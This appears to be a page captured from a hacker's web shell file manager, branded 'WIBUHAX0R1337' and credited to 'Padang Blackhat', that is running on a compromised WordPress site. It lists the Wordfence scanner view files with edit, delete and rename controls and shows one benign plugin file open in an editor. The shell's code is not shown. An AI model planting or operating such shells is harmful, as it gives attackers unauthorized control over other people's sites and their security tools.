-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
wordfence
/
views
/
scanner
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
issue-base.php
8.491KB
Edit File
Delete File
Rename
issue-checkGSB.php
2.409KB
Edit File
Delete File
Rename
issue-commentBadURL.php
3.094KB
Edit File
Delete File
Rename
issue-control-edit-comment.php
0.434KB
Edit File
Delete File
Rename
issue-control-edit-post.php
0.607KB
Edit File
Delete File
Rename
issue-control-hide-file.php
2.715KB
Edit File
Delete File
Rename
issue-control-ignore.php
2.134KB
Edit File
Delete File
Rename
issue-control-show-details.php
1.942KB
Edit File
Delete File
Rename
issue-coreUnknown.php
2KB
Edit File
Delete File
Rename
issue-database.php
2.116KB
Edit File
Delete File
Rename
issue-easyPassword.php
2.17KB
Edit File
Delete File
Rename
issue-postBadURL.php
3.187KB
Edit File
Delete File
Rename
issue-skippedPaths.php
1.696KB
Edit File
Delete File
Rename
issue-suspiciousAdminUsers.php
2.24KB
Edit File
Delete File
Rename
issue-wafStatus.php
1.938KB
Edit File
Delete File
Rename
issue-wfAssistantPresent.php
1.377KB
Edit File
Delete File
Rename
issue-wfPluginRemoved.php
3.074KB
Edit File
Delete File
Rename
issue-wfPluginUpgrade.php
3.993KB
Edit File
Delete File
Rename
issue-wfPluginVulnerable.php
3.019KB
Edit File
Delete File
Rename
issue-wfThemeUpgrade.php
3.58KB
Edit File
Delete File
Rename
issue-wfUpgrade.php
3.522KB
Edit File
Delete File
Rename
issue-wpscan_directoryList.php
2.221KB
Edit File
Delete File
Rename
issue-wpscan_fullPathDiscl.php
2.216KB
Edit File
Delete File
Rename
options-group-basic.php
1.38KB
Edit File
Delete File
Rename
options-group-general.php
7.866KB
Edit File
Delete File
Rename
options-group-scan-schedule.php
1.419KB
Edit File
Delete File
Rename
scan-progress-element.php
2.018KB
Edit File
Delete File
Rename
scan-progress.php
2.844KB
Edit File
Delete File
Rename
scan-scheduling.php
17.676KB
Edit File
Delete File
Rename
scan-type.php
9.115KB
Edit File
Delete File
Rename
scanner-status.php
3.983KB
Edit File
Delete File
Rename
site-cleaning-bottom.php
2.034KB
Edit File
Delete File
Rename
site-cleaning.php
9.117KB
Edit File
Delete File
Rename
<?php if (!defined('WORDFENCE_VERSION')) { exit; } /** * Presents a block list element specifically for the scan progress indicator. * * Expects $scanner. * * @var wfScanner $scanner The scanner state. */ $status = $scanner->stageStatus(); ?> <ul class="wf-scanner-progress"> <?php echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-spamvertising', 'title' => __('Spamvertising Checks', 'wordfence'), 'status' => $status[wfScanner::STAGE_SPAMVERTISING_CHECKS], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-spam', 'title' => __('Spam Check', 'wordfence'), 'status' => $status[wfScanner::STAGE_SPAM_CHECK], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-blacklist', 'title' => __('Blocklist Check', 'wordfence'), 'status' => $status[wfScanner::STAGE_BLACKLIST_CHECK], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-server', 'title' => __('Server State', 'wordfence'), 'status' => $status[wfScanner::STAGE_SERVER_STATE], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-changes', 'title' => __('File Changes', 'wordfence'), 'status' => $status[wfScanner::STAGE_FILE_CHANGES], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-malware', 'title' => __('Malware Scan', 'wordfence'), 'status' => $status[wfScanner::STAGE_MALWARE_SCAN], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-content', 'title' => __('Content Safety', 'wordfence'), 'status' => $status[wfScanner::STAGE_CONTENT_SAFETY], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-public', 'title' => __('Public Files', 'wordfence'), 'status' => $status[wfScanner::STAGE_PUBLIC_FILES], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-password', 'title' => __('Password Strength', 'wordfence'), 'status' => $status[wfScanner::STAGE_PASSWORD_STRENGTH], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-vulnerability', 'title' => __('Vulnerability Scan', 'wordfence'), 'status' => $status[wfScanner::STAGE_VULNERABILITY_SCAN], ))->render(); echo wfView::create('scanner/scan-progress-element', array( 'scanner' => $scanner, 'id' => 'wf-scan-options', 'title' => __('User & Option Audit', 'wordfence'), 'status' => $status[wfScanner::STAGE_OPTIONS_AUDIT], ))->render(); ?> </ul>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat